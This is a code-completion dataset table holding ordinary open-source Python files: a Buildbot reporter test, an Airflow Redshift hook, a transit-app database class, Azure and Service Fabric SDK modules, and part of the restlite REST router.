| repo_name (string, 5-100 chars) | path (string, 4-231 chars) | language (string, 1 class) | license (string, 15 classes) | size (int64, 6-947k) | score (float64, 0-0.34) | prefix (string, 0-8.16k chars) | middle (string, 3-512 chars) | suffix (string, 0-8.17k chars) |
|---|---|---|---|---|---|---|---|---|
| anish/buildbot | master/buildbot/test/unit/test_reporters_utils.py | Python | gpl-2.0 | 8,181 | 0.001834 |
# This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
import textwrap
from twisted.internet import defer
from twisted.trial import unittest
from buildbot.process.results import FAILURE
from buildbot.process.results import RETRY
from buildbot.process.results import SUCCESS
from buildbot.reporters import utils
from buildbot.test import fakedb
from buildbot.test.fake import fakemaster
from buildbot.test.util import logging
from buildbot.test.util.misc import TestReactorMixin
class TestDataUtils(TestReactorMixin, unittest.TestCase, logging.LoggingMixin):
LOGCONTENT = textwrap.dedent("""\
line zero
line 1
""")
def setUp(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self, wantData=True, wantDb=True,
wantMq=True)
def setupDb(self):
self.db = self.master.db
self.db.insertTestData([
fakedb.Master(id=92),
fakedb.Worker(id=13, name='wrk'),
fakedb.Buildset(id=98, results=SUCCESS, reason="testReason1"),
fakedb.Builder(id=80, name='Builder1'),
fakedb.BuildRequest(id=9, buildsetid=97, builderid=80),
            fakedb.BuildRequest(id=10, buildsetid=97, builderid=80),
fakedb.BuildRequest(id=11, buildsetid=98, builderid=80),
fakedb.BuildRequest(id=12, buildsetid=98, builderid=80),
            fakedb.Build(id=18, number=0, builderid=80, buildrequestid=9, workerid=13,
masterid=92, results=FAILURE),
fakedb.Build(id=19, number=1, builderid=80, buildrequestid=10, workerid=13,
masterid=92, results=RETRY),
fakedb.Build(id=20, number=2, builderid=80, buildrequestid=11, workerid=13,
masterid=92, results=SUCCESS),
fakedb.Build(id=21, number=3, builderid=80, buildrequestid=12, workerid=13,
masterid=92, results=SUCCESS),
fakedb.BuildsetSourceStamp(buildsetid=98, sourcestampid=234),
fakedb.SourceStamp(id=234),
fakedb.Change(changeid=13, branch='trunk', revision='9283', author='me@foo',
repository='svn://...', codebase='cbsvn',
project='world-domination', sourcestampid=234),
fakedb.Patch(id=99, patch_base64='aGVsbG8sIHdvcmxk',
patch_author='him@foo', patch_comment='foo', subdir='/foo',
patchlevel=3),
fakedb.SourceStamp(id=235, patchid=99),
])
for _id in (20, 21):
self.db.insertTestData([
fakedb.BuildProperty(
buildid=_id, name="workername", value="wrk"),
fakedb.BuildProperty(
buildid=_id, name="reason", value="because"),
fakedb.BuildProperty(
buildid=_id, name="owner", value="him"),
fakedb.Step(id=100 + _id, buildid=_id, name="step1"),
fakedb.Step(id=200 + _id, buildid=_id, name="step2"),
fakedb.Log(id=60 + _id, stepid=100 + _id, name='stdio', slug='stdio', type='s',
num_lines=2),
fakedb.LogChunk(logid=60 + _id, first_line=0, last_line=1, compressed=0,
content=self.LOGCONTENT),
])
@defer.inlineCallbacks
def getChangesForBuild(buildid):
assert buildid == 20
ch = yield self.master.db.changes.getChange(13)
return [ch]
self.master.db.changes.getChangesForBuild = getChangesForBuild
@defer.inlineCallbacks
def test_getDetailsForBuildset(self):
self.setupDb()
res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True,
wantSteps=True, wantPreviousBuild=True)
self.assertEqual(len(res['builds']), 2)
build1 = res['builds'][0]
build2 = res['builds'][1]
buildset = res['buildset']
self.assertEqual(build1['properties'], {'reason': ('because', 'fakedb'),
'owner': ('him', 'fakedb'),
'workername': ('wrk', 'fakedb')})
self.assertEqual(len(build1['steps']), 2)
self.assertEqual(build1['buildid'], 20)
self.assertEqual(build2['buildid'], 21)
self.assertEqual(buildset['bsid'], 98)
# make sure prev_build was computed
self.assertEqual(build1['prev_build']['buildid'], 18)
self.assertEqual(build2['prev_build']['buildid'], 20)
@defer.inlineCallbacks
def test_getDetailsForBuildsetWithLogs(self):
self.setupDb()
res = yield utils.getDetailsForBuildset(self.master, 98, wantProperties=True,
wantSteps=True, wantPreviousBuild=True,
wantLogs=True)
build1 = res['builds'][0]
self.assertEqual(
build1['steps'][0]['logs'][0]['content']['content'], self.LOGCONTENT)
@defer.inlineCallbacks
def test_getResponsibleUsers(self):
self.setupDb()
res = yield utils.getResponsibleUsersForSourceStamp(self.master, 234)
self.assertEqual(res, ["me@foo"])
@defer.inlineCallbacks
def test_getResponsibleUsersFromPatch(self):
self.setupDb()
res = yield utils.getResponsibleUsersForSourceStamp(self.master, 235)
self.assertEqual(res, ["him@foo"])
@defer.inlineCallbacks
def test_getResponsibleUsersForBuild(self):
self.setupDb()
res = yield utils.getResponsibleUsersForBuild(self.master, 20)
self.assertEqual(sorted(res), sorted(["me@foo", "him"]))
@defer.inlineCallbacks
def test_getResponsibleUsersForBuildWithBadOwner(self):
self.setUpLogging()
self.setupDb()
self.db.insertTestData([
fakedb.BuildProperty(
buildid=20, name="owner", value=["him"]),
])
res = yield utils.getResponsibleUsersForBuild(self.master, 20)
self.assertLogged("Please report a bug")
self.assertEqual(sorted(res), sorted(["me@foo", "him"]))
@defer.inlineCallbacks
def test_getResponsibleUsersForBuildWithOwners(self):
self.setupDb()
self.db.insertTestData([
fakedb.BuildProperty(
buildid=20, name="owners", value=["him", "her"]),
])
res = yield utils.getResponsibleUsersForBuild(self.master, 20)
self.assertEqual(sorted(res), sorted(["me@foo", "him", "her"]))
@defer.inlineCallbacks
def test_getPreviousBuild(self):
self.setupDb()
build = yield self.master.data.get(("builds", 21))
res = yield utils.getPreviousBuild(self.master, build)
self.assertEqual(res['buildid'], 20)
@defer.inlineCallbacks
def test_getPreviousBuildWithRetry(self):
self.setupDb()
build = yield self.master.data.get(("builds", 20))
res = yield utils.getPreviousBuild(self.master, build)
self.assertEqual(res['buildid'], 18)
class TestURLUtils(TestReactorMixin, unittest.TestCase):
def setUp(self):
self.setUpTestReactor()
self.master = fakemaster.make_master(self)
def test_UrlForBuild(self):
self.assertEqual(utils.getURLForBuild(self.master, 1, 3),
'http://localhost:8080/#builders/1/builds/3')
| zack3241/incubator-airflow | airflow/contrib/hooks/redshift_hook.py | Python | apache-2.0 | 4,181 | 0.001196 |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from airflow.contrib.hooks.aws_hook import AwsHook
class RedshiftHook(AwsHook):
"""
Interact with AWS Redshift, using the boto3 library
"""
def get_conn(self):
return self.get_client_type('redshift')
# TODO: Wrap create_cluster_snapshot
def cluster_status(self, cluster_identifier):
"""
Return status of a cluster
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
"""
conn = self.get_conn()
try:
response = conn.describe_clusters(
ClusterIdentifier=cluster_identifier)['Clusters']
return response[0]['ClusterStatus'] if response else None
except conn.exceptions.ClusterNotFoundFault:
return 'cluster_not_found'
def delete_cluster(
self,
cluster_identifier,
skip_final_cluster_snapshot=True,
final_cluster_snapshot_identifier=''):
"""
Delete a cluster and optionally create a snapshot
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
:param skip_final_cluster_snapshot: determines cluster snapshot creation
:type skip_final_cluster_snapshot: bool
:param final_cluster_snapshot_identifier: name of final cluster snapshot
:type final_cluster_snapshot_identifier: str
"""
response = self.get_conn().delete_cluster(
ClusterIdentifier=cluster_identifier,
SkipFinalClusterSnapshot=skip_final_cluster_snapshot,
FinalClusterSnapshotIdentifier=final_cluster_snapshot_identifier
)
return response['Cluster'] if response['Cluster'] else None
def describe_cluster_snapshots(self, cluster_identifier):
"""
Gets a list of snapshots for a cluster
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
"""
response = self.get_conn().describe_cluster_snapshots(
ClusterIdentifier=cluster_identifier
)
if 'Snapshots' not in response:
return None
snapshots = response['Snapshots']
        # materialize as a list so .sort() also works on Python 3, where
        # filter() returns an iterator without a sort method
        snapshots = [snapshot for snapshot in snapshots if snapshot['Status']]
        snapshots.sort(key=lambda x: x['SnapshotCreateTime'], reverse=True)
return snapshots
def restore_from_cluster_snapshot(self, cluster_identifier, snapshot_identifier):
"""
Restores a cluster from its snapshot
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
"""
response = self.get_conn().restore_from_cluster_snapshot(
ClusterIdentifier=cluster_identifier,
SnapshotIdentifier=snapshot_identifier
)
        return response['Cluster'] if response['Cluster'] else None
def create_cluster_snapshot(self, snapshot_identifier, cluster_identifier):
"""
Creates a snapshot of a cluster
:param snapshot_identifier: unique identifier for a snapshot of a cluster
:type snapshot_identifier: str
:param cluster_identifier: unique identifier of a cluster
:type cluster_identifier: str
"""
response = self.get_conn().create_cluster_snapshot(
SnapshotIdentifier=snapshot_identifier,
ClusterIdentifier=cluster_identifier,
)
return response['Snapshot'] if response['Snapshot'] else None
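# A hedged usage sketch, not part of the original module: exercising the hook
# as an Airflow task might. The 'aws_default' connection id and the cluster
# and snapshot names are illustrative assumptions, not defined in this file.
if __name__ == '__main__':
    hook = RedshiftHook(aws_conn_id='aws_default')
    # Snapshot the cluster only once it is up and reachable.
    if hook.cluster_status('example-cluster') == 'available':
        hook.create_cluster_snapshot('example-snapshot', 'example-cluster')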
| STOP2/stop2.0-backend | src/db.py | Python | mit | 4,799 | 0.004168 |
import asyncio
import time
import psycopg2
import psycopg2.pool
import os
import sys
class Database:
def __init__(self):
loop = asyncio.get_event_loop()
loop.run_until_complete(self.init_connection())
@asyncio.coroutine
def init_connection(self):
result = 1
loop_end = time.time() + 10
while time.time() < loop_end:
try:
self.pool = psycopg2.pool.ThreadedConnectionPool(1, 20, host=os.getenv('DBHOST', 'localhost'),
port=os.getenv('DBPORT', '5432'),
user=os.getenv('DBUSER', 'stop'),
database=os.getenv('DBNAME', 'stop'),
password=os.getenv('DBPASS', 'stop'))
result = 0
break
            except psycopg2.Error:
                time.sleep(1)  # back off briefly instead of busy-looping
                continue
if result:
print ("Initializing a database connection failed")
sys.exit()
def get_connection(self):
return self.pool.getconn()
def put_connection(self, conn):
self.pool.putconn(conn)
def store_request(self, trip_id, stop_id, device_id, push_notification):
conn = self.get_connection()
cur = conn.cursor()
if device_id == '0':
values = (trip_id, stop_id, device_id, True)
else:
values = (trip_id, stop_id, device_id, not push_notification)
sql = "INSERT INTO request (trip_id, stop_id, user_id, device_id, pushed, req_time, canceled) VALUES (%s, %s, 'user', %s, %s, now(), false) RETURNING id"
cur.execute(sql, values)
request_id = cur.fetchone()[0]
conn.commit()
self.put_connection(conn)
return request_id
def get_request_info(self, request_id):
conn = self.get_connection()
cur = conn.cursor()
values = (request_id,)
sql = "SELECT trip_id, stop_id FROM request WHERE id = %s"
cur.execute(sql, values)
result = cur.fetchone()
        self.put_connection(conn)
return result
def cancel_request(self, request_id):
conn = self.get_connection()
cur = conn.cursor()
values = (request_id,)
sql = "UPDATE request SET canceled = true, cancel_time = now() WHERE id = %s RETURNING trip_id"
cur.execute(sql, values)
trip_id = cur.fetchone()[0]
conn.commit()
self.put_connection(conn)
return trip_id
def get_requests(self, trip_id):
conn = self.get_connection()
cur = conn.cursor()
values = (trip_id,)
sql = "SELECT stop_id FROM request WHERE canceled = false AND trip_id = %s"
cur.execute(sql, values)
result = cur.fetchall()
self.put_connection(conn)
return result
def store_report(self, trip_id, stop_id):
conn = self.get_connection()
cur = conn.cursor()
values = (trip_id, stop_id)
sql = "INSERT INTO report (trip_id, stop_id, user_id, report_time) VALUES (%s, %s, 'user', now())"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def get_unpushed_requests(self):
conn = self.get_connection()
cur = conn.cursor()
sql = "SELECT trip_id,id,stop_id,device_id FROM request WHERE canceled = false AND pushed = false"
cur.execute(sql)
result = cur.fetchall()
self.put_connection(conn)
return result
def set_pushed(self, ids):
conn = self.get_connection()
cur = conn.cursor()
values = (tuple(ids),)
sql = "UPDATE request SET pushed = true WHERE id IN %s"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def add_vehicle(self, vehicle_id, trip_id):
conn = self.get_connection()
cur = conn.cursor()
values = (vehicle_id, trip_id)
sql = "INSERT INTO vehicle (vehicle_id, trip_id) VALUES (%s, %s)"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def remove_vehicle(self, vehicle_id, trip_id):
conn = self.get_connection()
cur = conn.cursor()
values = (vehicle_id, trip_id)
sql = "DELETE FROM vehicle WHERE vehicle_id = %s AND trip_id = %s"
cur.execute(sql, values)
conn.commit()
self.put_connection(conn)
def get_vehicles(self):
conn = self.get_connection()
cur = conn.cursor()
sql = "SELECT trip_id FROM vehicle"
cur.execute(sql)
result = cur.fetchall()
self.put_connection(conn)
return result
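# A hedged usage sketch, not part of the original module: the intended pool
# discipline is one get_connection/put_connection pair per call, which the
# methods above handle internally. The ids below are illustrative.
if __name__ == '__main__':
    db = Database()
    request_id = db.store_request(trip_id='1017', stop_id='1204119',
                                  device_id='abc123', push_notification=True)
    print(db.get_request_info(request_id))  # (trip_id, stop_id)
    db.cancel_request(request_id)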
| Azure/azure-sdk-for-python | sdk/resources/azure-mgmt-resource/azure/mgmt/resource/subscriptions/v2018_06_01/aio/operations/_subscriptions_operations.py | Python | mit | 12,046 | 0.004649 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._subscriptions_operations import build_check_zone_peers_request, build_get_request, build_list_locations_request, build_list_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class SubscriptionsOperations:
"""SubscriptionsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.resource.subscriptions.v2018_06_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list_locations(
self,
subscription_id: str,
**kwargs: Any
) -> AsyncIterable["_models.LocationListResult"]:
"""Gets all available geo-locations.
This operation provides all the locations that are available for resource providers; however,
each resource provider may support a subset of this list.
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LocationListResult or the result of cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.LocationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LocationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_locations_request(
subscription_id=subscription_id,
template_url=self.list_locations.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_locations_request(
subscription_id=subscription_id,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
async def extract_data(pipeline_response):
deserialized = self._deserialize("LocationListResult", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return None, AsyncList(list_of_elem)
async def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return AsyncItemPaged(
get_next, extract_data
)
list_locations.metadata = {'url': '/subscriptions/{subscriptionId}/locations'} # type: ignore
@distributed_trace_async
async def get(
self,
subscription_id: str,
**kwargs: Any
) -> "_models.Subscription":
"""Gets details about a specified subscription.
:param subscription_id: The ID of the target subscription.
:type subscription_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: Subscription, or the result of cls(response)
:rtype: ~azure.mgmt.resource.subscriptions.v2018_06_01.models.Subscription
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.Subscription"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
subscription_id=subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('Subscription', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}'} # type: ignore
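    # A hedged usage sketch (illustrative assumptions, not from this file):
    # per the class docstring, this operations group is reached through a
    # generated client rather than constructed directly, along these lines:
    #
    #   from azure.identity.aio import DefaultAzureCredential
    #   from azure.mgmt.resource.subscriptions.v2018_06_01.aio import SubscriptionClient
    #
    #   client = SubscriptionClient(DefaultAzureCredential())
    #   subscription = await client.subscriptions.get("<subscription-id>")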
@distributed_trace
def list(
self,
**kwargs: Any
) -> AsyncIterable["_models.SubscriptionListResult"]:
"""Gets all subscriptions for a tenant.
        :keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either SubscriptionListResult or the result of
cls(response)
:rtype:
~azure.core.async_paging.AsyncItemPaged[~azure.mgmt.resource.subscriptions.v2018_06_01.models.SubscriptionListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.SubscriptionListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
template_url=self.list.metadata['url'],
)
request = _convert_request(requ
| lmazuel/azure-sdk-for-python | azure-servicefabric/azure/servicefabric/models/cluster_upgrade_description_object.py | Python | mit | 5,840 | 0.00137 |
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class ClusterUpgradeDescriptionObject(Model):
"""Represents a ServiceFabric cluster upgrade.
:param config_version: The cluster configuration version (specified in the
cluster manifest).
:type config_version: str
:param code_version: The ServiceFabric code version of the cluster.
:type code_version: str
:param upgrade_kind: The kind of upgrade out of the following possible
values. Possible values include: 'Invalid', 'Rolling'. Default value:
"Rolling" .
:type upgrade_kind: str or ~azure.servicefabric.models.UpgradeKind
:param rolling_upgrade_mode: The mode used to monitor health during a
rolling upgrade. Possible values include: 'Invalid', 'UnmonitoredAuto',
'UnmonitoredManual', 'Monitored'. Default value: "UnmonitoredAuto" .
:type rolling_upgrade_mode: str or ~azure.servicefabric.models.UpgradeMode
:param upgrade_replica_set_check_timeout_in_seconds: The maximum amount of
time to block processing of an upgrade domain and prevent loss of
availability when there are unexpected issues. When this timeout expires,
processing of the upgrade domain will proceed regardless of availability
loss issues. The timeout is reset at the start of each upgrade domain.
    Valid values are between 0 and 4294967295 inclusive. (unsigned 32-bit
integer).
:type upgrade_replica_set_check_timeout_in_seconds: long
:param force_restart: If true, then processes are forcefully restarted
    during upgrade even when the code version has not changed (the upgrade
only changes configuration or data).
:type force_restart: bool
:param enable_delta_health_evaluation: When true, enables delta health
    evaluation rather than absolute health evaluation after completion of each
upgrade domain.
:type enable_delta_health_evaluation: bool
:param monitoring_policy: Describes the parameters for monitoring an
upgrade in Monitored mode.
:type monitoring_policy:
~azure.servicefabric.models.MonitoringPolicyDescription
:param cluster_health_policy: Defines a health policy used to evaluate the
health of the cluster or of a cluster node.
:type cluster_health_policy:
~azure.servicefabric.models.ClusterHealthPolicy
:param cluster_upgrade_health_policy: Defines a health policy used to
evaluate the health of the cluster during a cluster upgrade.
:type cluster_upgrade_health_policy:
~azure.servicefabric.models.ClusterUpgradeHealthPolicyObject
:param application_health_policy_map: Defines a map that contains specific
application health policies for different applications.
Each entry specifies as key the application name and as value an
ApplicationHealthPolicy used to evaluate the application health.
If an application is not specified in the map, the application health
evaluation uses the ApplicationHealthPolicy found in its application
manifest or the default application health policy (if no health policy is
defined in the manifest).
The map is empty by default.
:type application_health_policy_map:
list[~azure.servicefabric.models.ApplicationHealthPolicyMapItem]
"""
_attribute_map = {
'config_version': {'key': 'ConfigVersion', 'type': 'str'},
'code_version': {'key': 'CodeVersion', 'type': 'str'},
'upgrade_kind': {'key': 'UpgradeKind', 'type': 'str'},
'rolling_upgrade_mode': {'key': 'RollingUpgradeMode', 'type': 'str'},
'upgrade_replica_set_check_timeout_in_seconds': {'key': 'UpgradeReplicaSetCheckTimeoutInSeconds', 'type': 'long'},
'force_restart': {'key': 'ForceRestart', 'type': 'bool'},
'enable_delta_health_evaluation': {'key': 'EnableDeltaHealthEvaluation', 'type': 'bool'},
'monitoring_policy': {'key': 'MonitoringPolicy', 'type': 'MonitoringPolicyDescription'},
'cluster_health_policy': {'key': 'ClusterHealthPolicy', 'type': 'ClusterHealthPolicy'},
'cluster_upgrade_health_policy': {'key': 'ClusterUpgradeHealthPolicy', 'type': 'ClusterUpgradeHealthPolicyObject'},
'application_health_policy_map': {'key': 'ApplicationHealthPolicyMap', 'type': '[ApplicationHealthPolicyMapItem]'},
}
def __init__(self, config_version=None, code_version=None, upgrade_kind="Rolling", rolling_upgrade_mode="UnmonitoredAuto", upgrade_replica_set_check_timeout_in_seconds=None, force_restart=None, enable_delta_health_evaluation=None, monitoring_policy=None, cluster_health_policy=None, cluster_upgrade_health_policy=None, application_health_policy_map=None):
super(ClusterUpgradeDescriptionObject, self).__init__()
self.config_version = config_version
self.code_version = code_version
self.upgrade_kind = upgrade_kind
self.rolling_upgrade_mode = rolling_upgrade_mode
self.upgrade_replica_set_check_timeout_in_seconds = upgrade_replica_set_check_timeout_in_seconds
self.force_restart = force_restart
self.enable_delta_health_evaluation = enable_delta_health_evaluation
self.monitoring_policy = monitoring_policy
self.cluster_health_policy = cluster_health_policy
self.cluster_upgrade_health_policy = cluster_upgrade_health_policy
self.application_health_policy_map = application_health_policy_map
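# A hedged instantiation sketch, not part of the original module: only the
# version fields are supplied, so upgrade_kind and rolling_upgrade_mode keep
# their documented defaults. The version strings are illustrative.
if __name__ == '__main__':
    upgrade = ClusterUpgradeDescriptionObject(
        config_version='2.1',
        code_version='6.4.617.9590',
        force_restart=False)
    print(upgrade.rolling_upgrade_mode)  # "UnmonitoredAuto"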
| lbovet/platane | restlite.py | Python | lgpl-3.0 | 29,388 | 0.010617 |
'''
restlite: REST + Python + JSON + XML + SQLite + authentication.
http://code.google.com/p/restlite
Copyright (c) 2009, Kundan Singh, kundan10@gmail.com. All rights reserved.
License: released under LGPL (Lesser GNU Public License).
This light-weight module allows quick prototyping of web services using the RESTful architecture and allows easy
integration with sqlite3 database, and JSON and XML representation format. The approach is to provide all the
appropriate tools which you can use to build your own application, instead of providing an intrusive framework.
Features:
1. Very lightweight module in pure Python and no other dependencies hence ideal for quick prototyping.
2. Two levels of API: one is not intrusive (for low level WSGI) and other is intrusive (for high level @resource).
3. High level API can conveniently use sqlite3 database for resource storage.
4. Common list and tuple-based representation that is converted to JSON and/or XML.
5. Supports pure REST as well as allows browser and Flash Player access (with GET, POST only).
6. Integrates unit testing using doctest module.
7. Handles HTTP cookies and authentication.
Dependencies: Python 2.6.
'''
from wsgiref.util import setup_testing_defaults
from xml.dom import minidom
import re, sys, sqlite3, Cookie, base64, hashlib, time, traceback
try: import json
except: print 'Cannot import json. Please use Python 2.6.'; raise
_debug = False
defaultType = 'application/json' # default content type if ACCEPT is */*. Used in represent and router.
#------------------------------------------------------------------------------
# REST router
#------------------------------------------------------------------------------
def router(routes):
'''This is the main low level REST router function that takes a list of routes and sequentially tries to match the
request method and URL pattern. If a valid route is matched, request transformation is applied. If an application
is specified for a route, then the (wsgiref) application is invoked and the response is returned. This is used
together with wsgiref.make_server to launch a RESTful service.
You can use the routes to do several things: identify the response type (JSON, XML) from the URL, identify
some parts in the URL as variables available to your application handler, modify some HTTP header or message body
based on the URL, convert a GET or POST URL from the browser with URL suffix of /put or /delete to PUT or DELETE
URL to handle these commands from the browser, etc. For more details see the project web page.
>>> def files_handler(env, start_response):
... return '<files><type>' + env['ACCEPT'] + '</type><file>somefile.txt</file></files>'
>>> routes = [
... (r'GET,PUT,POST /xml/(?P<path>.*)$', 'GET,PUT,POST /%(path)s', 'ACCEPT=text/xml'),
... (r'GET /files$', files_handler) ]
>>> r = router(routes) # create the router using these routes
>>> # and test using the following code
>>> env, start_response = {'REQUEST_METHOD': 'GET', 'PATH_INFO': '/xml/files', 'SCRIPT_NAME': '', 'QUERY_STRING': ''}, lambda x,y: (x, y)
>>> print r(env, start_response)
<files><type>text/xml</type><file>somefile.txt</file></files>
'''
if isinstance(routes, dict) or hasattr(routes, 'items'): routes = routes.iteritems()
def handler(env, start_response):
import logging
setup_testing_defaults(env)
if 'wsgiorg.routing_args' not in env: env['wsgiorg.routing_args'] = dict()
env['COOKIE'] = Cookie.SimpleCookie()
if 'HTTP_COOKIE' in env: env['COOKIE'].load(env['HTTP_COOKIE'])
        if 'QUERY_STRING' not in env:
            env['QUERY_STRING'] = None
for route in routes:
method, pattern = route[0].split(' ', 1)
methods = method.split(',')
if env['REQUEST_METHOD'] not in methods: continue
path = env['PATH_INFO'] + ('?' + env['QUERY_STRING'] if env['QUERY_STRING'] else '')
match = re.match(pattern, path)
if match:
app = None
if callable(route[-1]):
route, app = route[:-1], route[-1] # found the app
if len(route) > 1:
new_methods, path = route[1].split(' ', 1)
env['REQUEST_METHOD'] = new_methods.split(',')[methods.index(env['REQUEST_METHOD'])]
env['PATH_INFO'], ignore, env['QUERY_STRING'] = (path % match.groupdict()).partition('?') #@UnusedVariable
for name, value in [x.split('=', 1) for x in route[2:]]:
env[name] = value % match.groupdict()
env['wsgiorg.routing_args'].update(match.groupdict())
if app is not None:
matching = match.group(0)
env['PATH_INFO'], env['SCRIPT_NAME'] = env['PATH_INFO'][len(matching):], env['SCRIPT_NAME'] + env['PATH_INFO'][:len(matching)]
def my_response(status, headers):
if 'RESPONSE_HEADERS' not in env: env['RESPONSE_STATUS'], env['RESPONSE_HEADERS'] = status, headers
try: response = app(env, my_response)
except Status: response, env['RESPONSE_STATUS'] = None, str(sys.exc_info()[1])
except Exception, e:
logging.getLogger("platane.restlite").error(e)
print traceback.format_exc()
response, env['RESPONSE_STATUS'] = [traceback.format_exc()], '500 Internal Server Error'
if response is None: response = []
headers = env.get('RESPONSE_HEADERS', [('Content-Type', 'text/plain')])
                    headers.append(('Accept-Charset', 'utf-8'))
orig = Cookie.SimpleCookie(); cookie = env['COOKIE']
                    if 'HTTP_COOKIE' in env: orig.load(env['HTTP_COOKIE'])
map(lambda x: cookie.__delitem__(x), [x for x in orig if x in cookie and str(orig[x]) == str(cookie[x])])
if len(cookie): headers.extend([(x[0], x[1].strip()) for x in [str(y).split(':', 1) for y in cookie.itervalues()]])
start_response(env.get('RESPONSE_STATUS', '200 OK'), headers)
if _debug:
if response: print headers, '\n'+str(response)[:256]
                    if type(response) == str:
                        return [response]
                    else:
                        return response  # already an iterable of strings
start_response('404 Not Found', [('Content-Type', 'text/plain')])
return ['Use one of these URL forms\n ' + '\n '.join(str(x[0]) for x in routes)]
return handler
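# A hedged launch sketch, not part of the original module: serving the routes
# from the docstring above with wsgiref, as the router() description suggests.
#
#   from wsgiref.simple_server import make_server
#   routes = [(r'GET /files$', files_handler)]
#   make_server('0.0.0.0', 8080, router(routes)).serve_forever()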
#------------------------------------------------------------------------------
# Representations: JSON, XML
#------------------------------------------------------------------------------
def tojson(value):
'''The function converts the supplied value to JSON representation. It assumes the unified list format of value.
